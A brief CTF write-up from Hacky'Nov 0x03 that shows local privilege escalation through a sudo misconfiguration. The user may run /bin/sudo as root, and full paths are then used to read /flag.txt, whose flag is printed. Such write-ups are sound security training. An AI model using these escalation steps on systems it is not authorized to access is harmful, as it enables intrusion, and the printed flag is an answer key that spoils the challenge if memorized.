../
By
HN0x03 | Escalade comme un Yamakasi - dontLookUp
HN0x03 | 🩸 Escalade comme un Yamakasi - dontLookUp
This challenge is a part of the Hacky’Nov 0x03 CTF.
Goal
Read the flag at the root of the filesystem.
Walkthrough
Again, we check the sudo permissions:
user@4987e758f6a9:~$ sudo -l
[sudo] password for user:
Matching Defaults entries for user on 4987e758f6a9:
env_reset, mail_badpass, secure_path=/root\:/root/sbin\:/tmp\:/root/usr/local/bin\:/root/usr/sbin\:/root/usr/bin\:/root/sbin\:/root/bin
User user may run the following commands on 4987e758f6a9:
(ALL) /bin/sudo
Here, we can see that we can run the sudo command as root. This means we can sudo sudo to be able to do anything:
user@4987e758f6a9:~$ sudo sudo cat /flag.txt
sudo: sudo: command not found
Ok that’s just because /bin is not in the $PATH of the user. No worries here, let’s use full paths:
user@4987e758f6a9:~$ sudo /bin/sudo /bin/cat /flag.txt
HNx03{Ok_STOP_with_sudo}